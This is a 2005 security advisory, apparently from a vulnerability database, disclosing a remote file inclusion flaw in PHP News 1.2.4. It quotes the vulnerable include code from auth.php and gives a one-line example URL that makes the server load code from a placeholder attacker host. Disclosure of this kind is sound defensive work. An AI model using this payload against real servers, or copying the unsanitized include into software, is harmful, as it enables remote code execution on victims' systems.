PHP News <= 1.2.4 - Remote File Inclusion (VXSfx)

2005-03-02T00:00:00
ID SECURITYVULNS:DOC:7965
Type securityvulns
Reporter Securityvulns
Modified 2005-03-02T00:00:00

Description

-- == -- == -- == -- == -- == -- == -- == -- == -- == -- Name: PHP News Version: 1.2.4 (and possibly 1.2.3) Homepage: http://newsphp.sourceforge.net/

Author: Filip Groszynski (VXSfx) Date: 23 February 2005 -- == -- == -- == -- == -- == -- == -- == -- == -- == --

Vulnerable code in auth.php:

if (is_Array($userDetails)) { ... } / You're about to log in/no user language is specified / else if(file_exists($path . 'languages/' . $lang . '.admin.lng')) { include_once($path . 'languages/' . $lang . '.admin.lng'); .... } else { include_once($path . 'languages/en_GB.admin.lng'); .... }


Example:

if register_globals=on and allow_url_fopen=on: http://[victim]/[dir]/auth.php?path=http://[hacker_box]/


Fix and Vendor status:

Vendor has been notified, expect an official patch tomorrow.


Contact:

Author:    Filip Groszynski   (VXSfx)
Location:  Poland <Warsaw>
Email:     groszynskif <at> gmail <dot> com
HP:        http://shell.homeunix.org

-- == -- == -- == -- == -- == -- == -- == -- == -- == --